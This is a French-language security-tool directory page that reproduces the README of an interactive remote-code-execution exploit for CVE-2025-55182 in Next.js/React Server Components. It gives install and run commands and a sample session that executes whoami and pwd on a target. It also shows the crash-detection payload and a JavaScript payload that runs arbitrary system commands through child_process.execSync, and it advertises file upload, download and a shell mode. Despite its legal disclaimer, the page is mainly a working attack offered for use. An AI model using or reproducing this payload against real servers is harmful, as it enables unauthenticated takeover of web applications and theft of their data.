Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-shellinteractive — Exploit RCE interactif pour CVE-2025-55182 ciblant la vulnérabilité de désérialisation des composants serveur Next.js/React. Fonctionnalités : détection automatique, exécution de commandes, transfert de fichiers et un shell intégré avec historique et auto-complétion. | Kitploit
Outils/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub
mrr0b0t19/cve-2025-55182-shellinteractive

CVE-2025-55182-shellinteractive

Exploit RCE interactif pour CVE-2025-55182 ciblant la vulnérabilité de désérialisation des composants serveur Next.js/React. Fonctionnalités : détection automatique, exécution de commandes, transfert de fichiers et un shell intégré avec historique et auto-complétion.

Voir le dépôt
2132il y a 10 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182-shellinteractive

Base utilisée à partir de : https://github.com/Emiyelbarto/CVE-2025-55182-PoC Merci beaucoup pour cette excellente contribution.

Aperçu

CVE-2025-55182 est une vulnérabilité de désérialisation dans les composants serveur Next.js/React qui permet à des attaquants distants non authentifiés d'exécuter du code arbitraire sur les serveurs affectés. La vulnérabilité provient d'une gestion incorrecte des données sérialisées dans les actions serveur React.

Fonctionnalités clés :

  • ✅ Shell interactif avec historique des commandes et autocomplétion
  • ✅ Détection automatique des vulnérabilités
  • ✅ Exécution de commandes à distance
  • ✅ Capacités de téléchargement/téléversement de fichiers
  • ✅ Suite de tests intégrée
  • ✅ Paramètres cibles configurables

Installation

Prérequis

  • Python 3.8 ou plus récent
  • Bibliothèque requests

Configuration rapide

# Cloner le dépôt
git clone https://github.com/yourusername/hokma.git
cd hokma

# Installer les dépendances
pip install requests

# Rendre le script exécutable (optionnel)
chmod +x hokma.py

Utilisation

Utilisation de base

# Démarrer le shell interactif
python hokma.py

# Vérifier uniquement la vulnérabilité
python hokma.py -u http://target.com --check

# Exécuter une seule commande
python hokma.py -u http://target.com -c "whoami"

Commandes du shell interactif

help                    Afficher ce message d'aide
set URL <url>          Définir l'URL cible
set ID <action_id>     Définir l'ID d'action (par défaut : user-profile-action)
show                   Afficher les options actuelles
check [url]            Vérifier si la cible est vulnérable
exploit <commande>     Exécuter une commande sur la cible
shell                  Démarrer un shell de commande interactif
test                   Exécuter des commandes de test (id, whoami, etc.)
upload <local> <dist>  Téléverser un fichier local vers la cible
download <dist> <local> Télécharger un fichier distant (encodé en base64)
clear                  Effacer l'écran
exit/quit              Quitter le shell

Exemple de session

$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 Exploit RCE des composants serveur React (CVE-2025-55182)
Shell interactif - Tapez 'help' pour les commandes

hokma> set URL http://app-vulnerable.com
[+] URL définie sur : http://app-vulnerable.com

hokma> check
[*] Vérification de la vulnérabilité sur la cible : http://app-vulnerable.com...
[+] LA CIBLE EST VULNÉRABLE !

hokma> exploit whoami
[*] Exécution de la commande : whoami
[*] Le serveur a répondu avec le statut : 200

--- SORTIE DE LA COMMANDE ---
www-data
----------------------

hokma> shell
[*] Démarrage du shell inversé. Utilisez 'exit' pour revenir.
[*] Entrez les commandes à exécuter sur la cible :
cmd> pwd
[*] Exécution de la commande : pwd

--- SORTIE DE LA COMMANDE ---
/var/www/html
----------------------
cmd> exit

Options de configuration

OptionValeur par défautDescription
URL cibleAucuneURL de l'application vulnérable
ID d'actionuser-profile-actionID de l'action serveur ciblée
Délai d'attente3 secondesDélai d'attente des requêtes

Détails techniques

Détection de la vulnérabilité

L'outil envoie une requête multipart spécialement conçue qui provoque un crash sur les systèmes vulnérables :

  • Utilise la charge utile : ["$1:a:a"] avec un objet vide {}
  • Détecte la vulnérabilité via des réponses HTTP 500 ou des modèles d'erreur spécifiques

Mécanisme d'exploitation

  1. Construction de la charge utile JavaScript : Crée un script Node.js à l'aide du constructeur Function
  2. Exécution du processus enfant : Utilise child_process.execSync() pour exécuter des commandes système
  3. Extraction de la réponse : Capture et affiche la sortie de la commande

Structure de la charge utile

const cmd = "COMMANDE";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Échec de l'exécution de la commande : " + e.message; 
    }
});

Utilisation éthique et clause de non-responsabilité

AVIS JURIDIQUE IMPORTANT

Cet outil est destiné à :

  • Des tests de sécurité autorisés
  • Des fins éducatives
  • Des recherches sur les vulnérabilités avec un consentement approprié

N'UTILISEZ PAS cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique.

Les développeurs ne sont pas responsables de toute utilisation abusive de cet outil. Les utilisateurs doivent se conformer à toutes les lois applicables et obtenir une autorisation appropriée avant de tester.

Limitations connues

  1. Exigences relatives à la cible :

    • Serveur Node.js avec composants serveur React
    • Vulnérable à CVE-2025-55182
    • Module de processus enfant disponible
  2. Limitations de détection :

    • Peut produire des faux positifs/négatifs
    • Dépend des réponses d'erreur spécifiques
  3. Contraintes d'exploitation :

    • Les commandes s'exécutent avec les privilèges du processus serveur
    • La sortie peut être tronquée dans certains cas
    • Les commandes complexes peuvent nécessiter un échappement spécial
Télécharger l’outil